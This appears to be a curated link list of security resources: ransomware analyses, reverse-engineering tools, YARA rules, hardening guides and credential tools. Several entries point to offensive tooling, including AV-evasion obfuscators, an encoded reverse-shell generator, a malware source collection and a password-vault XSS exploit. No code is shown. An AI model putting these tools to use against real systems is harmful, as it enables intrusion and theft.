RANSOM MAFIA.ANALYSIS OF THE WORLD’S FIRST RANSOMWARE CARTEL | |||
Sleuthing DarkSide Crypto-Ransom Payments with the Wolfram Language | |||
Apostle Ransomware Analysis | |||
From Wiper to Ransomware | The Evolution of Agrius | |||
Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise | |||
Hades Ransomware Operators Use Distinctive Tactics and Infrastructure | |||
Miscellaneous Malware RE | 195 | over 2 years ago | |
BlackMatter x64 Linux Variant (esxcli variant) | |||
Teaching an Old Dog New Tricks: 2017 Magniber Ransomware Uses PrintNightmare Vulnerability to Infect Victims in South Korea | |||
RansomExx Renner | |||
RANSOMWHERE | : Total tracked ransomware payments all time. Ransomwhere is the open, crowdsourced ransomware payment tracker. Browse and download ransomware payment data or help build our dataset by reporting ransomware demands you have received | ||
BlackByteDecryptor | 64 | about 3 years ago | : This is a decryptor for the ransomware BlackByte |
Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus | : We investigate mhyprot2.sys, a vulnerable anti-cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware | ||
CSIRT / Malware Analysis / Virus/Anti-Virus | |||
Avast open-sources its machine-code decompiler | |||
Morris worm | 590 | almost 4 years ago | |
make a process unkillable?! | (windows 10) | ||
Attack inception | : Compromised supply chain within a supply chain poses new risks – Microsoft Secure | ||
Curtis' Blog: Bypassing Next Gen AV During a Pentest | |||
Inception | 368 | 9 months ago | : Provides In-memory compilation and reflective loading of C# apps for AV evasion |
Invoke-NeutralizeAV | 41 | almost 6 years ago | : Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting |
BinariesThatDoesOtherStuff | |||
Circlean | 454 | over 1 year ago | : USB key cleaner |
The ELF Virus Writing HOWTO | |||
mcreator | 146 | over 4 years ago | : Encoded Reverse Shell Generator With Techniques To Bypass AV's |
metame | 569 | about 5 years ago | : is a simple metamorphic code engine for |
rustdsplit | 35 | over 4 years ago | : At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this |
Virus Total API in Python | 1 | almost 4 years ago | |
VirusTotal CLI | 836 | 3 months ago | |
Antivirus Event Analysis Cheat Sheet v1.7.2 | |||
UglyEXe | : | ||
How to bypass Defender in a few easy steps | |||
Engineering antivirus evasion | |||
avcleaner | 1,011 | over 2 years ago | : C/C++ source obfuscator for antivirus bypass |
An Empirical Assessment of Endpoint Security Systems Against Advanced Persistent Threats Attack Vectors | |||
VxSig | 259 | 9 months ago | : Automatically generate AV byte signatures from sets of similar binaries |
CSIRT / Malware Analysis / Trojans/Loggers | |||
IcedID Banking Trojan Shares Code with Pony 2.0 Trojan | |||
Turla | : In and out of its unique Outlook backdoor | ||
QMKhuehuebr | 85 | almost 6 years ago | : Trying to hack into keyboards |
CSIRT / Malware Analysis / Malware Articles and Sources | |||
“VANILLA” malware | : vanishing antiviruses by interleaving layers and layers of attacks | ||
A Mix of Python & VBA in a Malicious Word Document | |||
MalwareAnalysisForHedgehogs | : Throw your bat cape over your spikes and get started with malware analysis and reverse engineering. I work as a malware analyst and like to share my knowledge | ||
2020-10-22 - TRAFFIC ANALYSIS EXERCISE - OMEGACAST | |||
EMOTET | : EMOTET INFECTIONS WITH ZEUS PANDA BANKER AND TRICKBOT (GTAG: DEL34) | ||
A MIPS-32 ELF non-resident virus with false disassembly | , Made with love by S01den (@s01den) | ||
Linux.Kropotkine.asm | 15,853 | about 1 month ago | |
A WILD KOBALOS APPEARS | , Tricksy Linux malware goes after HPCs | ||
List of victim organizations attacked by Ransomware gangs released on the DarkWeb | |||
CSIRT / Reverse Engineering | |||
Fundamentos de Engenharia Reversa | (Fundamentals of Reverse Engineering, pt-br) | ||
Reverse Engineer's Toolkit | 4,834 | 7 months ago | |
Dangers of the Decompiler | |||
RE guide for beginners: Methodology and tools | |||
REDasm | 1,570 | 26 days ago | : Crossplatform, interactive, multiarchitecture disassembler |
Reversing ARM Binaries | |||
Programmer De-anonymization from Binary Executables | 86 | over 6 years ago | |
Reverse engineering WhatsApp Web | 6,149 | 7 months ago | |
BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts) | |||
BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts) | |||
Reverse Engineering for Beginners | |||
VivienneVMM | 781 | about 4 years ago | : VivienneVMM is a stealthy debugging framework implemented via an Intel VT-x hypervisor |
Xori | 724 | almost 2 years ago | : Custom disassembly framework |
rattle | 350 | about 1 year ago | : Rattle is an EVM binary static analysis framework designed to work on deployed smart contracts |
starshipraider | 144 | about 1 month ago | : High performance embedded systems debug/reverse engineering platform |
GBA-IDA-Pseudo-Terminal | 13 | almost 5 years ago | : IDAPython tools to aid with analysis, disassembly and data extraction using IDA python commands, tailored for the GBA architecture at some parts |
binja-ipython | 29 | over 6 years ago | : A plugin to integrate an IPython kernel into Binary Ninja |
PySameSame | 23 | over 6 years ago | : This is a python version of samesame repo to generate homograph strings |
Reversing a Japanese Wireless SD Card From Zero to Code Execution | |||
Practical-Reverse-Engineering-using-Radare2 | 107 | almost 8 years ago | : Training Materials of Practical Reverse Engineering using Radare2 |
Reverse engineering Go binaries using Radare 2 and Python | |||
r2pipe for V | 6 | about 2 months ago | : r2pipe for V |
radare2-webui | 94 | 3 months ago | : webui repository for radare2 |
CSIRT / Reverse Engineering / IDA Pro: | |||
idaemu | 551 | over 2 years ago | : idaemu is an IDA Pro Plugin - use for emulating code in IDA Pro |
lighthouse | 2,255 | 4 months ago | : Code Coverage Explorer for IDA Pro & Binary Ninja |
IDAPro Cheat Sheet | |||
Lumen | 931 | 21 days ago | : A private Lumina server for IDA Pro |
EFISwissKnife | 147 | over 7 years ago | : An IDA plugin to improve (U)EFI reversing |
IDA Python | |||
Tenet | 1,326 | about 1 year ago | : |
TLS callbacks | |||
rename gamemaker handlers | 2 | about 3 years ago | |
CSIRT / Reverse Engineering / GDB: | |||
pwndbg | 7,629 | 9 days ago | : Exploit Development and Reverse Engineering with GDB Made Easy |
PEDA | 5,899 | 4 months ago | : Python Exploit Development Assistance for GDB |
gef | : GDB Enhanced Features for exploit devs & reversers | ||
some things about gef | |||
Controlling GDB | |||
Low Level Visualization via Debuggers | |||
Faster GDB Startup | |||
CSIRT / Reverse Engineering / Frida: | |||
Getting Started with Frida Tools | |||
part 1 | Frida hooking android : , , , and | ||
fridump3 | 180 | 15 days ago | : A universal memory dumper using Frida for Python 3 |
r2flutch | 167 | over 2 years ago | : Tool to decrypt iOS apps using r2frida |
CSIRT / Reverse Engineering / Immunity: | |||
Immunity Debugger | |||
mona | : is a python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform). It runs on Immunity Debugger and WinDBG, and requires python 2.7. Although it runs in WinDBG x64, the majority of its features were written specifically for 32bit processes | ||
CSIRT / Reverse Engineering | |||
LIEF | : Library to Instrument Executable Formats | ||
DEBIN | : Predicting Debug Information in Stripped Binaries | ||
Analyzing ARM Cortex-based MCU firmwares using Binary Ninja | |||
Manticore | : Symbolic Execution Tool For Analysis Of Binaries And Smart Contracts | ||
Beam me up, CFG. | : Earlier in 2018 while revisiting the Delay Import Table, I used dumpbin to check the Load Configuration data of a file and noticed new fields in it. And at the time of writing this, more fields were added! The first, CFGuard, caught my attention and I learned about Control Flow Guard, a new security feature. To put it simply, it protects the execution flow from redirection - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead | ||
PBA - Analysis Tools | 52 | over 5 years ago | : My own versions of the programs from the book "Practical Binary Analysis" |
functrace | 89 | over 5 years ago | : is a tool that helps to analyze a binary file with dynamic instrumentation using DynamoRIO |
Signature-Base | 2,484 | 8 days ago | : signature-base is the signature database for my scanners LOKI and SPARK Core |
CSIRT / Reverse Engineering / Signature-Base | |||
Generic Anomalies | 2,484 | 8 days ago | : Detects an embedded executable in a non-executable file |
CSIRT / Reverse Engineering | |||
Virtuailor | 1,273 | over 3 years ago | : IDAPython tool for C++ vtables reconstruction |
Linux Reverse Engineering CTFs for Beginners | |||
execution-trace-viewer | 270 | over 3 years ago | : Tool for viewing and analyzing execution traces |
Reverse Engineering of a Not-so-Secure IoT Device | |||
CSIRT / Reverse Engineering / ELF | |||
Python for Reverse Engineering 1 | : ELF Binaries | ||
The 101 of ELF files on Linux | : Understanding and Analysis - Linux Audit | ||
On ELF, Part 1 | |||
On ELF, Part 2 | |||
CSIRT / Reverse Engineering | |||
Kaitai Struct | : A new way to develop parsers for binary structures | ||
findLoop | 26 | over 5 years ago | : find possible encryption/decryption or compression/decompression code |
Reverse Engineering 'A Link to the Past (GBA)' ep 1 | |||
wiggle | : The concepting self hosted executable binary search engine | ||
uncompyle6 | 3,796 | 7 days ago | : A cross-version |
Decompyle++ | 3,361 | about 1 month ago | : C++ python bytecode disassembler and decompiler |
bearparser | 648 | 3 months ago | |
Reverse-engineering precision op amps from a 1969 analog computer | |||
CPU Adventure – Unknown CPU Reversing | : We reverse-engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it… | ||
pev | 3 | over 1 year ago | : pev is a full-featured, open source, multiplatform command line toolkit to work with PE (Portable Executables) binaries |
Sourcetrail | 14,937 | almost 3 years ago | : free and open-source cross-platform source explorer |
Qiling Framework | : Qiling Advanced Binary Emulation Framework | ||
CSIRT / Reverse Engineering / Obfuscation/Deobfuscation: | |||
batch_deobfuscator | 145 | about 2 years ago | : Deobfuscate batch scripts obfuscated using string substitution and escape character techniques |
Tales Of Binary Deobfuscation - Part 1 | |||
evilquest_deobfuscator | 6 | about 4 years ago | : EvilQuest/ThiefQuest malware strings decrypter/deobfuscator. : Small utility to hash EvilQuest code and cstrings sections |
Deobfuscating DanaBot’s API Hashing | |||
XLMMacroDeobfuscator | 572 | 7 months ago | : Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros) |
syntia | 301 | over 4 years ago | : Program synthesis based deobfuscation framework for the USENIX 2017 paper "Syntia: Synthesizing the Semantics of Obfuscated Code" |
Deobfuscation | : recovering an OLLVM-protected program | ||
Stadeo | 147 | about 3 years ago | : Control-flow-flattening and string deobfuscator |
Semi-Automatic Code Deobfuscation | 71 | over 3 years ago | |
msynth | 281 | 6 months ago | : Code deobfuscation framework to simplify Mixed Boolean-Arithmetic (MBA) expressions |
CSIRT / Reverse Engineering | |||
Glasgow Debug Tool | 1,921 | 13 days ago | : Scots Army Knife for electronics |
windbglib | 323 | about 2 years ago | : Public repository for windbglib, a wrapper around pykd.pyd (for Windbg), used by mona.py |
VX Underground | |||
CSIRT / Reverse Engineering / VX Underground | |||
MalwareSourceCode | 15,853 | about 1 month ago | : Collection of malware source code for a variety of platforms in an array of different programming languages |
VXUG-Papers | 1,146 | almost 3 years ago | : Research code & from members of vx-underground |
CSIRT / Reverse Engineering | |||
How to automatically attach a process to a debugger. | (pt-br) | ||
Taming Virtual Machine Based Code Protection | |||
HyperDbg Debugger | 2,927 | 5 days ago | : The Source Code of HyperDbg Debugger |
The HT Editor | 411 | over 1 year ago | : A file editor/viewer/analyzer for executables |
ImHex | 45,125 | 15 days ago | : A Hex Editor for Reverse Engineers, Programmers and people that value their eye sight when working at 3 AM |
playing with little endian | |||
Finding memory bugs with AddressSanitizer | |||
flare-floss | 3,255 | 9 days ago | : FireEye Labs Obfuscated String Solver - Automatically extract obfuscated strings from malware |
#BazarBackdoor Group #CobaltStrike Payload | |||
The Debugging Book | : Tools and Techniques for Automated Software Debugging | ||
Debugging System with DCI and Windbg | |||
SCAS/SCASB/SCASW/SCASD | : Scan String, x86 Instruction Set Reference | ||
dexcalibur | 1,059 | almost 2 years ago | : Android reverse engineering tool focused on dynamic instrumentation automation leveraging Frida. It disassembles dex, analyzes it statically, generates hooks, discovers reflected methods, stores intercepted data and does new things from it. Its aim is to be an all-in-one Android reverse engineering platform |
Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086) | |||
rr | 9,192 | 4 days ago | : Record and Replay Framework |
panda | 2,489 | 18 days ago | : Platform for Architecture-Neutral Dynamic Analysis |
qira | 3,957 | over 2 years ago | : QEMU Interactive Runtime Analyser |
qemu_blog | 1,362 | about 1 year ago | : A series of posts about QEMU internals |
Reverse engineering (Absolute) UEFI modules for beginners | |||
miasm | 3,495 | 3 months ago | : Reverse engineering framework in Python |
rehex | 2,312 | 5 days ago | : Reverse Engineers' Hex Editor |
Bless | 66 | almost 6 years ago | : Gtk# Hex Editor (fork) |
Reverse Engineering the M6 Smart Fitness Bracelet | |||
Reverse Engineering a Linux executable – hello world | |||
rizin | 2,711 | 4 days ago | : UNIX-like reverse engineering framework and command-line toolset |
reFlutter | 1,294 | over 2 years ago | : Flutter Reverse Engineering Framework |
OpenSecurityTraining2 | : OpenSecurityTraining Inc. (EIN 86-1180701) is a 501c3 non-profit working to create the world's best cybersecurity training | ||
Nightmare | is an intro to binary exploitation / reverse engineering course based around ctf challenges | ||
Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries | |||
Sometimes static analysis of shellcode is annoying or infeasible, and what you really want to do is debug it; I'll show you how | |||
capa | 4,885 | 3 days ago | : The FLARE team's open-source tool to identify capabilities in executable files |
aDLL | 70 | over 3 years ago | Adventure of Dinamic Lynk Library: aDLL is a binary analysis tool focused on the automatic discovery of DLL Hijacking vulnerabilities. The tool analyzes the image of the binary loaded in memory to search for DLLs loaded at load-time and makes use of the Microsoft Detours library to intercept calls to the LoadLibrary/LoadLibraryEx functions to analyze the DLLs loaded at run-time |
pyc2bytecode | 133 | over 1 year ago | : A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including Python 3.10.*) |
Reverse Engineering PsExec for fun and knowledge | |||
Reverse Engineering TikTok's VM Obfuscation | |||
CSIRT / Reverse Engineering / Decompilers | |||
decompile_java | , using - another java decompiler | ||
NoVmp | 1,956 | over 3 years ago | : A static devirtualizer for VMProtect x64 3.x powered by VTIL |
Awesome IDA, x64DBG & OllyDBG plugins | 1,283 | 6 months ago | : A curated list of IDA x64DBG and OllyDBG plugins |
edb | 2,705 | 3 months ago | is a cross-platform AArch32/x86/x86-64 debugger |
Interactive Delphi Reconstructor IDR | 968 | over 1 year ago | : a decompiler of executable files (EXE) and dynamic libraries (DLL), written in Delphi and executed in Windows32 environment |
PyInstaller Extractor | 2,960 | 10 days ago | |
CSIRT / Reverse Engineering / Yara | |||
Yara-Rules | 4,178 | 7 months ago | : Repository of yara rules |
Repository containing Indicators of Compromise and Yara rules | 79 | over 3 years ago | |
YARA in a nutshell | |||
yara | 8,316 | about 2 months ago | : The pattern matching swiss knife |
mkYARA | : Writing YARA rules for the lazy analyst | ||
Yara-Rules | 570 | 11 months ago | : Repository of YARA rules made by McAfee ATR Team |
ReversingLabs YARA Rules | 768 | about 1 month ago | |
YaraHunts | 95 | over 1 year ago | : Random hunting oriented yara rules |
YARA Rules for ProcFilter | 84 | over 7 years ago | |
ThreatHunting | 568 | about 1 month ago | |
yara-validator | 39 | about 4 years ago | : Validates yara rules and tries to repair the broken ones |
Vim Syntax Highlighting for YARA Rules | 31 | 9 months ago | : A Vim syntax-highlighting file for YARA rules covering YARA 4.0 |
CSIRT / Reverse Engineering / Yara / Rules DB: | |||
xored_pefile_mini | 10 | about 2 years ago | : detects files with a PE header at uint32(0x3c), xored with a key of 1, 2 or 4 bytes. by |
CSIRT / Reverse Engineering / Ghidra | |||
ghidra | : is a software reverse engineering (SRE) framework | ||
ghidra-firmware-utils | 399 | 7 months ago | : Ghidra utilities for analyzing firmware |
dragondance | 286 | 5 months ago | : Binary code coverage visualizer plugin for Ghidra |
Decompiler Analysis Engine | : Welcome to the Decompiler Analysis Engine. It is a complete library for performing automated data-flow analysis on software, starting from the binary executable | ||
Working With Ghidra's P-Code To Identify Vulnerable Function Calls | |||
GhIDA | : | ||
Ghidraaas | 779 | almost 4 years ago | : Ghidra as a Service |
SVD-Loader for Ghidra | : Simplifying bare-metal ARM reverse engineering | ||
GhidraX64Dbg | 56 | over 3 years ago | : Extract annotations from Ghidra into an X32/X64 dbg database |
Reverse Engineering Go Binaries with Ghidra | |||
Introduction to Reverse Engineering with Ghidra: A Four Session Course | |||
Ghidra Plugin Development for Vulnerability Research - Part-1 | |||
AngryGhidra | 562 | 4 months ago | : Use angr in Ghidra |
Defeating Code Obfuscation with Angr | |||
ghidra2frida | : The new bridge between Ghidra and Frida | ||
ghidra-scripts | 92 | about 1 year ago | : A collection of my Ghidra scripts |
Reversing Raw Binary Firmware Files in Ghidra | |||
Ghidrathon | 698 | 7 months ago | : The FLARE team's open-source extension to add |
IDA Graph view with outlined function included | |||
G-3PO: A Protocol Droid for Ghidra | |||
CSIRT / Frameworks | |||
Inject code into running Python processes | 2,801 | about 1 year ago | |
malspider | 418 | about 2 years ago | : Malspider is a web spidering framework that detects characteristics of web compromises |
AIL-framework | 1,304 | 17 days ago | : AIL framework - : |
CSIRT / Patching | |||
Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882) | |||
CSIRT / Hardening | |||
BlueWars | : Defensive Capture The Flag that took place at H2HC | ||
CCAT | 442 | over 1 year ago | : Cisco Config Analysis Tool |
Ciderpress | 48 | about 5 years ago | : Hardened wordpress installer |
debian-cis | 765 | 2 months ago | : PCI-DSS compliant Debian 7/8 hardening |
Endlessh | 7,320 | 6 months ago | : an SSH tarpit |
ERNW Repository of Hardening Guides | 611 | about 3 years ago | : This repository contains various hardening guides compiled by ERNW for various purposes |
fero | 209 | about 6 years ago | : YubiHSM2-backed signing server |
FirewallChecker | 101 | about 3 years ago | : A self-contained firewall checker |
Get SSH login notification on Telegram | |||
Hardentools | 2,931 | 8 months ago | is a utility that disables a number of risky Windows features |
How To Secure A Linux Server | 17,554 | about 1 month ago | : An evolving how-to guide for securing a Linux server |
kconfig-hardened-check | 1,700 | 3 days ago | : A tool for checking the hardening options in the Linux kernel config |
Implementing Least-Privilege Administrative Models | |||
Iptables Essentials | 1,483 | over 4 years ago | : Common Firewall Rules and Commands |
Keyringer | : encrypted and distributed secret sharing software | ||
Keystone Project | . Github: | ||
linux-hardened | 5 | over 6 years ago | : Minimal supplement to upstream Kernel Self Protection Project changes |
List of sites with two factor auth | 3,389 | about 3 hours ago | |
nftables | : nftables is the successor to iptables. It replaces the existing iptables, ip6tables, arptables and ebtables framework. It uses the Linux kernel and a new userspace utility called nft. nftables provides a compatibility layer for the ip(6)tables and framework | ||
Common approaches to securing Linux servers and what runs on them. | Nice article with a lot of resources: | ||
opmsg | 750 | over 1 year ago | : is a replacement for gpg which can encrypt/sign/verify your mails or create/verify detached signatures of local files. Even though the opmsg output looks similar, the concept is entirely different |
prowler | 10,867 | about 4 hours ago | : AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and additional checks. Official CIS for |
reconbf | 47 | about 8 years ago | : Recon system hardening scanner |
Sarlacc | 44 | over 6 years ago | is an SMTP server that I use in my malware lab to collect spam from infected hosts |
Secure & Ad-free Internet Anywhere With Streisand and Pi Hole | |||
Secure Secure Shell | by | ||
Securing Docker Containers | |||
securityonion-docs | 84 | 6 days ago | |
security.txt | : A proposed standard which allows websites to define security policies | ||
security-txt | 1,797 | almost 2 years ago | : A proposed standard that allows websites to define security policies |
Hardenize | See your site config with | ||
Set up two-factor authentication for SSH on Fedora | |||
solo-hw | 182 | almost 5 years ago | : Hardware sources for Solo |
ssh-auditor | 608 | 11 months ago | : The best way to scan for weak ssh passwords on your network |
Streisand | 23,195 | over 3 years ago | sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists |
The Practical Linux Hardening Guide | 9,947 | over 4 years ago | : 🔥 This guide details the planning and the tools involved in creating secure Linux production systems - work in progress |
tls-what-can-go-wrong | 100 | almost 6 years ago | : TLS - what can go wrong? |
upvote | 452 | about 3 years ago | : A multi-platform binary whitelisting solution |
Using a Hardened Container Image for Secure Applications in the Cloud | |||
Zero-knowledge attestation | |||
Reverie | : An optimized zero-knowledge proof system | ||
CSIRT / Hardening / RHEL Like systems: | |||
CentOS7 Lockdown | 73 | almost 3 years ago | |
RHEL7-CIS | 30 | over 4 years ago | : Ansible RHEL 7 - CIS Benchmark Hardening Script |
cisecurity | 9 | over 4 years ago | : Configures Linux systems to Center for Internet Security Linux hardening standard |
CSIRT / Hardening | |||
bdshemu | : The shellcode emulator | ||
IPv6 Security Best Practices | |||
auditd | 1,499 | about 1 month ago | : Best Practice Auditd Configuration |
Hardened/PaX Quickstart | |||
tosh | 417 | over 3 years ago | : Imagine your SSH server only listens on an IPv6 address, and where the last 6 digits are changing every 30 seconds as a TOTP code |
CSIRT / Hardening / Kubernetes: | |||
9 Kubernetes Security Best Practices Everyone Must Follow | |||
Kubernetes Hardening Guidance | NSA/CISA | ||
CSIRT / Hardening | |||
CHAPS | 173 | 7 months ago | : Configuration Hardening Assessment PowerShell Script (CHAPS) |
Awesome Windows Domain Hardening | 1,749 | almost 5 years ago | : A curated list of awesome Security Hardening techniques for Windows |
NSA/CISA Kubernetes Hardening Guidance | |||
Learn and Test DMARC | : Visualizing the communication between email servers will help you understand what SPF, DKIM, and DMARC do and how these mechanisms work | ||
VideoLan Robots.txt | |||
ssh & linux cheat sheets | |||
ssh-audit | 3,417 | about 1 month ago | : SSH server & client auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc) |
CSIRT / Hardening / WebServers / A lot of good posts by geek flare: | |||
How to Configure SSL Certificate on Google Cloud Load Balancer? | |||
Nginx Web Server Security & Hardening Guide | |||
IBM HTTP Server Security & Hardening Guide | |||
Apache Tomcat Hardening and Security Guide | |||
How to Enable TLS 1.3 in Nginx, Cloudflare? | |||
Apache Web Server Hardening & Security Guide | (broken!??) | ||
CSIRT / Hardening / WebServers / CaCerts | |||
List of free rfc3161 servers. | TSA Servers | ||
certstream-server | 271 | 8 months ago | : Certificate Transparency Log aggregation, parsing, and streaming service written in Elixir |
CSIRT / Hardening / WebServers / Apache: | |||
Apache Security | by | ||
dotdotslash | 418 | 5 months ago | : A tool to help you search for Directory Traversal Vulnerabilities |
A new security header: Feature Policy | |||
How do I prevent apache from serving the .git directory? | |||
CSIRT / Hardening / WebServers / Nginx: | |||
20 Essential Things to Know if You’re on Nginx Web Server | |||
Nginx C function | : Create your desired C application on top of nginx module | ||
NGINX config for SSL with Let's Encrypt certs | |||
How to Configure Nginx SSL Certificate Chain | |||
CSIRT / Hardening / WebServers / PHP: | |||
Cheatsheet for finding vulnerable PHP code using grep | 346 | over 6 years ago | : This will assist you in finding potentially vulnerable PHP code. Each type of grep command is categorized by the type of vulnerability you generally find with that function |
It's All About Time | . - A tool for performing feasibility analyses of timing attacks. : A tool for performing network timing attacks on plaintext and hashed password authentication | ||
snuffleupagus | 26 | about 1 year ago | : Security module for php7 - Killing bugclasses and virtual-patching the rest! |
FOPO-PHP-Deobfuscator | 86 | over 7 years ago | : A simple script to deobfuscate PHP file obfuscated with FOPO Obfuscator |
Decode.Tools | : Decode PHP Obfuscator by FOPO | ||
CSIRT / Hardening / WebServers / Ruby: | |||
TSS - Threshold Secret Sharing | 23 | over 3 years ago | : A Ruby implementation of Threshold Secret Sharing (Shamir) as defined in IETF Internet-Draft draft-mcgrew-tss-03.txt |
CSIRT / Hardening / WebServers | |||
IT Security Guidelines for Transport Layer Security (TLS) | |||
CAA Mandated by CA/Browser Forum | |||
ENVOY | is an open source edge and service proxy, designed for cloud-native applications | ||
ghp | 262 | almost 6 years ago | : A simple web server for serving static GitHub Pages locally |
LEAR | 168 | almost 6 years ago | : Linux Engine for Asset Retrieval |
NFHTTP | 588 | over 1 year ago | : A cross platform C++ HTTP library that interfaces natively to other platforms |
Security/Server Side TLS | by Mozilla | ||
security.txt | : A proposed standard which allows websites to define security policies | ||
urlscan.io | : A sandbox for the web | ||
QUIC's combined transport- and cryptographic handshake allows it to be 1 Round Trip faster than TCP + TLS and main problems. | |||
Secure Headers | 3,164 | 11 days ago | : Manages application of security headers with many safe defaults |
HTTP/2: The Sequel is Always Worse | |||
RFC 9116: A File Format to Aid in Security Vulnerability Disclosure | |||
CSIRT / Credentials | |||
WhiteIntel | : WhiteIntel assists companies in identifying compromised credentials through malware campaigns | ||
Cr3dOv3r | 2,025 | about 1 month ago | Search if your credentials were leaked: |
pw-pwnage-cfworker | 154 | over 2 years ago | : Deploy a Cloudflare Worker to sanely score users' new passwords with zxcvbn AND check for matches against haveibeenpwned's 5.1+ billion breached accounts |
XSS Exploit code for retrieving passwords stored in a Password Vault | |||
login_duress | 108 | 3 months ago | : A BSD authentication module for duress passwords |
XSStrike | 13,378 | 4 months ago | : Most advanced XSS detection suite |
Was my password leaked? | : Search for credentials leaked on pwndb | ||
bitwarden_rs | 39,076 | 7 days ago | : Unofficial Bitwarden compatible server written in Rust |
pcfg_cracker | 321 | 4 months ago | : Probabilistic Context Free Grammar (PCFG) password guess generator |
Depix | 26,007 | 3 months ago | : Recovers passwords from pixelized screenshots |
pwndb | 1,306 | over 3 years ago | : Search for leaked credentials |
Password Lists | 319 | 6 months ago | : Password lists with top passwords to optimize bruteforce attacks |
pwndb.py | 1,306 | over 3 years ago | : |
awsome | 429 | 4 months ago | KeePass: Curated list of KeePass-related projects |
CSIRT / Credentials / awsome | |||
KeePassium | 1,201 | 7 days ago | : KeePass-compatible password manager for iOS |
Launch PowerShell Script From Within KeePass And Include Password Secure String Credential | , , | ||
libkeepass | 103 | about 4 years ago | : Python module to read KeePass 1.x/KeePassX (v3) and KeePass 2.x (v4) files |
KeepassXC-Pwned | 35 | 28 days ago | : Check your keepassxc database against previously breached haveibeenpwned passwords |
CSIRT / Credentials / Tokens | |||
Use YubiKey security key to sign into AWS Management Console with YubiKey for multi-factor authentication | |||
Introducing the Qubes U2F Proxy | |||
YubiKey-Guide | 11,198 | 19 days ago | : Guide to using YubiKey for GPG and SSH |
Using a Yubikey for GPG and SSH | : Sebastian Neef - 0day.work | ||
PIN and Management Key | |||
Improve login security with challenge-response authentication | |||
URU Card | : Arduino FIDO2 Authenticator | ||
YubiKey at Datadog | 495 | 10 months ago | |
This is a practical guide to using YubiKey as a SmartCard for storing GPG encryption and signing keys. | 11,198 | 19 days ago | |
yubikey-ssh-setup | 3,243 | about 1 month ago | |
CSIRT / Secure Programming | |||
Hardening C/C++ Programs Part II: Executable-Space Protection and ASLR | |||
Checklist of the most important security countermeasures when designing, testing, and releasing your API | 22,480 | 7 days ago | |
sanitizers | 11,517 | 21 days ago | |
Gitian | is a secure source-control oriented software distribution method | ||
Canary | 30 | over 5 years ago | : Input Detection and Response |
Canarytokens | by Thinkst, | ||
CANARY FILES: GENERATING FAKE FILES TO DETECT CRITICAL DATA LOSS FROM COMPLEX COMPUTER NETWORKS | |||
How to Know if Someone Access your Files with Canary Tokens | |||
Wycheproof | 2,787 | 3 months ago | : Project Wycheproof tests crypto libraries against known attacks |
Web App Security 101 | : Keep Calm and Do Threat Modeling | ||
CSIRT / Secure Programming / SSL/TLS for dummies: | |||
part 1 | : Ciphersuite, Hashing, Encryption; | ||
part 2 | : Understanding key exchange algorithm; | ||
part 3 | : Understanding Certificate Authority | ||
CSIRT / Secure Programming | |||
heaphopper | 212 | about 2 months ago | : HeapHopper is a bounded model checking framework for Heap-implementations |
Ristretto | is a technique for constructing prime order elliptic curve groups with non-malleable encodings | ||
SEI CERT C Coding Standard | : The C rules and recommendations in this wiki are a work in progress and reflect the current thinking of the secure coding community. Because this is a development website, many pages are incomplete or contain errors. As rules and recommendations mature, they are published in report or book form as official releases. These releases are issued as dictated by the needs and interests of the secure software development community | ||
CSIRT / Secure Programming / SEI CERT C Coding Standard | |||
MSC24-C. Do not use deprecated or obsolescent functions | |||
US-CERT: memcpy_s() and memmove_s() | |||
CSIRT / Secure Programming | |||
Safe C Library | 13 | over 9 years ago | : The Safe C Library provides bounds-checking memory and string functions per ISO/IEC TR24731. These functions are alternatives to the existing standard C library functions that promote safer, more secure programming |
Field Experience With Annex K — Bounds Checking Interfaces | |||
TSLint | 5,906 | over 3 years ago | : An extensible linter for the TypeScript language |
rubocop | 12,650 | 5 days ago | : A Ruby static code analyzer and formatter, based on the community Ruby style guide |
Librando | : transparent code randomization for just-in-time compilers | ||
Checked C | : Making C Safe by Extension | ||
Practical case: Buffer Overflow 0x01 | |||
pigaios | 635 | almost 2 years ago | : A tool for diffing source codes directly against binaries |
A Git Horror Story | : Repository Integrity With Signed Commits. How to use git securely (signing commits) | ||
An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure | |||
Tooling for verification of PGP signed commits | 79,540 | 7 days ago | |
tlse | 545 | about 1 month ago | : Single C file TLS 1.2/1.3 implementation, using tomcrypt as crypto library |
tinyalloc | 778 | 4 months ago | : malloc / free replacement for unmanaged, linear memory situations (e.g. WASM, embedded devices...) |
Sandboxed API | 1,667 | 7 days ago | : Sandboxed API automatically generates sandboxes for C/C++ libraries |
HACL* | 1,627 | 9 days ago | : a formally verified cryptographic library written in F* |
Villoc | 602 | over 4 years ago | : Villoc is a heap visualisation tool; it's a Python script that renders a static HTML file |
How C array sizes become part of the binary interface of a library | |||
MazuCC | 516 | about 4 years ago | : A minimalist C compiler with x86_64 code generation |
When the going gets tough | : Understanding the challenges with Product commoditization in SCA | ||
huskyCI | 576 | 6 months ago | : huskyCI is an open source tool that performs security tests inside CI pipelines of multiple projects and centralizes all results into a database for further analysis and metrics |
